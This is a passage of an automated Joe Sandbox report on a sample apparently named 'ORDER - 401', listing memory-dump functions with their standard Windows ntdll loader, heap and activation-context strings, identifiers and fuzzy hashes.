                                                                                  • Instruction ID: bbfb40b15e932c023de57e43e9412e54164e2fc941e47e395f823400469e7f38
                                                                                  • Opcode Fuzzy Hash: 627618d6b9e441e5b23645cdf7cbb4ecf68e418de8a901f0fd4b97882a23612d
                                                                                  • Instruction Fuzzy Hash: 06121371A08362CFD765DF18C480BAAB7E4BF84704F04496EF9C58B291EB74D945CB92
                                                                                  Function 010989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • VerifierDebug, xrefs: 01098CA5
                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01098B8F
                                                                                  • VerifierDlls, xrefs: 01098CBD
                                                                                  • HandleTraces, xrefs: 01098C8F
                                                                                  • VerifierFlags, xrefs: 01098C50
                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01098A67
                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01098A3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                  • API String ID: 0-3223716464
                                                                                  • Opcode ID: d809cab19edfb6093dd13ab9c25736be42435a71f2a96b741c3232c1586af019
                                                                                  • Instruction ID: d67516393db5b90991ebad58abaeb8b720d7b577b5eca6ef36768f1138d3f52e
                                                                                  • Opcode Fuzzy Hash: d809cab19edfb6093dd13ab9c25736be42435a71f2a96b741c3232c1586af019
                                                                                  • Instruction Fuzzy Hash: A991597190534AEFDB26EF2888A0B5B77E5AF55714F04846AFAC06B391C7B0EC40DB91
                                                                                  Function 0101EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                  • API String ID: 0-1109411897
                                                                                  • Opcode ID: 8fbc9d523c556485fe83f817fa4d6603f7f74a79496fe338d2fd5b70db76ab10
                                                                                  • Instruction ID: 8687a7e7377ecca482ead4cdfe979fa9efa4c5e209b8036748b6ab131496f3de
                                                                                  • Opcode Fuzzy Hash: 8fbc9d523c556485fe83f817fa4d6603f7f74a79496fe338d2fd5b70db76ab10
                                                                                  • Instruction Fuzzy Hash: 86A24870E0562A8BDBA5CF18CC88BADBBB5BF45304F1442E9D98DA7254DB349E85CF04
                                                                                  Function 010463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  • Opcode ID: 4c4a7537cc56724df4d3661e911f47f8474b677d4a0941a336d5455b5221ffa8
                                                                                  • Instruction ID: 589a514ada8af8da34baca7e1b346c4689185d30843ee17ba0c2343a25147eda
                                                                                  • Opcode Fuzzy Hash: 4c4a7537cc56724df4d3661e911f47f8474b677d4a0941a336d5455b5221ffa8
                                                                                  • Instruction Fuzzy Hash: C6913A70F04316DBEF6AEF58D884BAE7BA1BF51B14F000179D5D0AB281EBB59441C791
                                                                                  Function 0100645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitShimEngine, xrefs: 010699F4, 01069A07, 01069A30
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010699ED
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01069A11, 01069A3A
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01069A2A
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01069A01
                                                                                  • apphelp.dll, xrefs: 01006496
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-204845295
                                                                                  • Opcode ID: 52ce86a9bc1f62c7be73c0033cee6ebe6bd789be5bb47cd1e9db501f68d58d5d
                                                                                  • Instruction ID: c63017270b25ac036f868a5b30b027d539f86c76f5dd9e47d6968eda96de208c
                                                                                  • Opcode Fuzzy Hash: 52ce86a9bc1f62c7be73c0033cee6ebe6bd789be5bb47cd1e9db501f68d58d5d
                                                                                  • Instruction Fuzzy Hash: 5E51DF716183089FE726DF24C841AAF77E9FF84748F000929F6D59B1A0D771E944CB92
                                                                                  Function 01042674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01082178
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010821BF
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01082160, 0108219A, 010821BA
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01082165
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01082180
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0108219F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                  • API String ID: 0-861424205
                                                                                  • Opcode ID: a84ad44a46dc2f73858fc8e6dc8c50ff5acc2677c94772ab9171baf4f0922b08
                                                                                  • Instruction ID: 3796e51e00860c5eeba2729cd5e55dfe212cc2a7fa186ec0e3070dc6e25b9ee1
                                                                                  • Opcode Fuzzy Hash: a84ad44a46dc2f73858fc8e6dc8c50ff5acc2677c94772ab9171baf4f0922b08
                                                                                  • Instruction Fuzzy Hash: 68315B76B4031577EB21EA999C81F6E7E78EF64B90F1500A9BB80A7150D270DA00D2A1
                                                                                  Function 0104C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0104C6C3
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01088170
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01088181, 010881F5
                                                                                  • LdrpInitializeProcess, xrefs: 0104C6C4
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 010881E5
                                                                                  • LdrpInitializeImportRedirection, xrefs: 01088177, 010881EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-475462383
                                                                                  • Opcode ID: 7a9a7b622127485bff3b39f04be5990c961dfb5d26097b00d51abad21bc483bb
                                                                                  • Instruction ID: 4d2401aa768cac4732c85b210f54c7a8a6576f3395d8286dd58fdda1d5c0044f
                                                                                  • Opcode Fuzzy Hash: 7a9a7b622127485bff3b39f04be5990c961dfb5d26097b00d51abad21bc483bb
                                                                                  • Instruction Fuzzy Hash: 353135B17487069FD324EF28D985E6AB7D9EFD4B10F044568F9C1AB290E620EC04C7A2
                                                                                  Function 0105096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 01052DF0: LdrInitializeThunk.NTDLL ref: 01052DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050BB6
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050D74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 1404860816-0
                                                                                  • Opcode ID: c0e672b5bb815c73c9368ac0196c668ccf7acb1f2f2135a162802f3d9757bc91
                                                                                  • Instruction ID: af13ca2e73372197752cc46fb49785df36411add57602c6ae039bd90898bddfb
                                                                                  • Opcode Fuzzy Hash: c0e672b5bb815c73c9368ac0196c668ccf7acb1f2f2135a162802f3d9757bc91
                                                                                  • Instruction Fuzzy Hash: F6425B75900715DFDBA1DF28C880BAAB7F4BF44314F1485A9E9C9EB245E770AA84CF60
                                                                                  Function 0101A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  • API String ID: 0-379654539
                                                                                  • Opcode ID: c1dc5089b5375980c51080cd26135e5821a588c223b59154d92a98d0aa673cf5
                                                                                  • Instruction ID: a0baacdf8f837fb9cb4c5dd3dd139919f50e9f2da5a77fab307b9e44d968a5a3
                                                                                  • Opcode Fuzzy Hash: c1dc5089b5375980c51080cd26135e5821a588c223b59154d92a98d0aa673cf5
                                                                                  • Instruction Fuzzy Hash: 61C1AD706093C6CFD711DF58C040BAAB7E4BF88704F04496AF9D58B259E738CA49CB56
                                                                                  Function 01048402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01048421
                                                                                  • @, xrefs: 01048591
                                                                                  • LdrpInitializeProcess, xrefs: 01048422
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0104855E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1918872054
                                                                                  • Opcode ID: 83fa70ab3e42e7a1d08d9f9a3600e27f41090105269e78063d36c8a2ef814f85
                                                                                  • Instruction ID: 511c4af37a9c9cbf2d386762e73570cb8a46a9b72e9a0972c62dd86fd5777734
                                                                                  • Opcode Fuzzy Hash: 83fa70ab3e42e7a1d08d9f9a3600e27f41090105269e78063d36c8a2ef814f85
                                                                                  • Instruction Fuzzy Hash: 00916EB1508345AFEB61EE65CC80EABBAE8BF84744F404D3EFAC496151E734D9448B62
                                                                                  Function 0104273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010822B6
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010821D9, 010822B1
                                                                                  • .Local, xrefs: 010428D8
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 010821DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                  • API String ID: 0-1239276146
                                                                                  • Opcode ID: 2b3d121b21b8be6d20b5d78754f55935952cdac387be62218cfeed5f0ad0c4ad
                                                                                  • Instruction ID: 323ee6f63798258620a0f6657026ccf8a1fc2bde2d07c78fec6001e7e4370699
                                                                                  • Opcode Fuzzy Hash: 2b3d121b21b8be6d20b5d78754f55935952cdac387be62218cfeed5f0ad0c4ad
                                                                                  • Instruction Fuzzy Hash: D3A1D175A0422ADBDB64DF58EC84BA9B7B0BF58314F1541F9E988AB251D7309E80CF90
                                                                                  Function 01044AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01083456
                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01083437
                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0108342A
                                                                                  • RtlDeactivateActivationContext, xrefs: 01083425, 01083432, 01083451
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                  • API String ID: 0-1245972979
                                                                                  • Opcode ID: 7e0bfc4765e5d1fda9c278910fa080321fa589c310ab1a744bf1029676adbba5
                                                                                  • Instruction ID: 5c102999bc9a9ac4b890564c2472b227493d90b300892cdd9a504ff818451338
                                                                                  • Opcode Fuzzy Hash: 7e0bfc4765e5d1fda9c278910fa080321fa589c310ab1a744bf1029676adbba5
                                                                                  • Instruction Fuzzy Hash: 47613572604B169BD762DF1CC881B2ABBE0BF80B10F1885A9E9D5DF251DB30E800CB95
                                                                                  Function 010164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01070FE5
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010710AE
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0107106B
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01071028
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  • API String ID: 0-1468400865
                                                                                  • Opcode ID: ac97c3052e29f29633a27dcf5281714772a51aff80e5b4643c9e364c19e78184
                                                                                  • Instruction ID: d7e564fe4d609a5a29dd48f7eb9c6f8bbd888a2de74d347a7244dfaa8640d264
                                                                                  • Opcode Fuzzy Hash: ac97c3052e29f29633a27dcf5281714772a51aff80e5b4643c9e364c19e78184
                                                                                  • Instruction Fuzzy Hash: 8671DFB19043059FCB61DF14CC84B9B7FE8AF55764F0004A9F9898B18AD779D588CBD2
                                                                                  Function 01044D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01083640, 0108366C
                                                                                  • LdrpFindDllActivationContext, xrefs: 01083636, 01083662
                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0108362F
                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 0108365C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 0-3779518884
                                                                                  • Opcode ID: 8abc3e7eab862bb6664f67e5d04cfb0de28f5344a92562d3422fda391108f93f
                                                                                  • Instruction ID: 36127d20228421b2becb59de62b223075a2fcfccaa68bad222691be2931952cf
                                                                                  • Opcode Fuzzy Hash: 8abc3e7eab862bb6664f67e5d04cfb0de28f5344a92562d3422fda391108f93f
                                                                                  • Instruction Fuzzy Hash: E93129E2900611AFDF76BA0CCCC8B7976E4BB01B54F0641BAD6D4D7151D7B0DC808791
                                                                                  Function 0103245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0107A9A2
                                                                                  • LdrpDynamicShimModule, xrefs: 0107A998
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0107A992
                                                                                  • apphelp.dll, xrefs: 01032462
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-176724104
                                                                                  • Opcode ID: d2512c5cc2549dbd43311f08445e2baf8b8408b31974c09021a63bc4424a29b9
                                                                                  • Instruction ID: c5e1598189791b31e2148c9e7c79e6edc6f153eab5b0af7bba7a50963dcb0317
                                                                                  • Opcode Fuzzy Hash: d2512c5cc2549dbd43311f08445e2baf8b8408b31974c09021a63bc4424a29b9
                                                                                  • Instruction Fuzzy Hash: 38316A75F00201EBDB3A9F5CD880AAE77F4FB84710F19006AE9A067245CBF099D1C740
                                                                                  Function 010229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0102327D
                                                                                  • HEAP[%wZ]: , xrefs: 01023255
                                                                                  • HEAP: , xrefs: 01023264
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                  • API String ID: 0-617086771
                                                                                  • Opcode ID: 17956fb4fba118d3f9fe487084ee7b4a5e93ff42e38ba746848fb67a437a793f
                                                                                  • Instruction ID: 5ba3116403c43f1572d4ae2150e4f3b81331c92041ebc16be7e52824dfe13e34
                                                                                  • Opcode Fuzzy Hash: 17956fb4fba118d3f9fe487084ee7b4a5e93ff42e38ba746848fb67a437a793f
                                                                                  • Instruction Fuzzy Hash: 9B92DF70A04269DFDB65CFA8C444BAEBBF1FF48300F1480A9E999AB351D739A941CF50
                                                                                  Function 01020770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: c44fbe452cf9b86a92f889836e5aa95ce5d7980cd6984b3fbc1c021aaefd2120
                                                                                  • Instruction ID: 4864bc5d46b621048e469de66749eafb6c0a5f277576951059993203282bca7a
                                                                                  • Opcode Fuzzy Hash: c44fbe452cf9b86a92f889836e5aa95ce5d7980cd6984b3fbc1c021aaefd2120
                                                                                  • Instruction Fuzzy Hash: BFF19A70B00616DFEB26CF68C884BAAB7F5FF45304F1481A8E5969B395D734E981CB90
                                                                                  Function 01036962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  • API String ID: 0-1077428164
                                                                                  • Opcode ID: fcb94c3ce3104de2931bfea124ad4b5c9b84698a97e6639621e1ebdc5e893c46
                                                                                  • Instruction ID: 55846ee17ffa2715ced80e54982b56f3f6c4a52edad7215ba17fca56a80d9040
                                                                                  • Opcode Fuzzy Hash: fcb94c3ce3104de2931bfea124ad4b5c9b84698a97e6639621e1ebdc5e893c46
                                                                                  • Instruction Fuzzy Hash: BFC27DB1A083419FE765CF28C880BABBBE9AFC8714F04896DF9C987241D735D944CB52
                                                                                  Function 0100A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  • API String ID: 0-2779062949
                                                                                  • Opcode ID: b4cfa3a389c948a71442ac7111804643c319b367a59708b74459534c91fd355e
                                                                                  • Instruction ID: f9ccb971ca57f0927b7981f9de6eb8645034fde2f7d7b9a75d102d971fd10062
                                                                                  • Opcode Fuzzy Hash: b4cfa3a389c948a71442ac7111804643c319b367a59708b74459534c91fd355e
                                                                                  • Instruction Fuzzy Hash: FFA16D719012299BEB71DF68CD88BEEB7B8EF48710F1041E9E989A7250D7359E84CF50
                                                                                  Function 01030BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0107A121
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0107A10F
                                                                                  • LdrpCheckModule, xrefs: 0107A117
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-161242083
                                                                                  • Opcode ID: 7e837ffc2d6a75bba93c7c754375d09bbe87359d40a9bc37b147cef4988ccce9
                                                                                  • Instruction ID: e93891b20a2002b41546ffebf079d21a45a55ca14bcb75af67b52cf077c1e1fa
                                                                                  • Opcode Fuzzy Hash: 7e837ffc2d6a75bba93c7c754375d09bbe87359d40a9bc37b147cef4988ccce9
                                                                                  • Instruction Fuzzy Hash: AC71F170E00209DFDB2ADF68C880ABEB7F4FB84704F18446DE99697255E774AD81CB50
                                                                                  Function 01020A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-1334570610
                                                                                  • Opcode ID: 7541bed8585447b6ef340f4d1396916a111bfd2c2ba4e3de994b75d8027659b9
                                                                                  • Instruction ID: b98da8b52cae013446b65e9f2ca7e5d54f4c8bd9500045759ef6b8008c9151a7
                                                                                  • Opcode Fuzzy Hash: 7541bed8585447b6ef340f4d1396916a111bfd2c2ba4e3de994b75d8027659b9
                                                                                  • Instruction Fuzzy Hash: 1461C270600355DFDB6ACF28C880BAABBE1FF45704F148599E4D98F296D770E881CB95
                                                                                  Function 0104C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 010882D7
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010882E8
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 010882DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
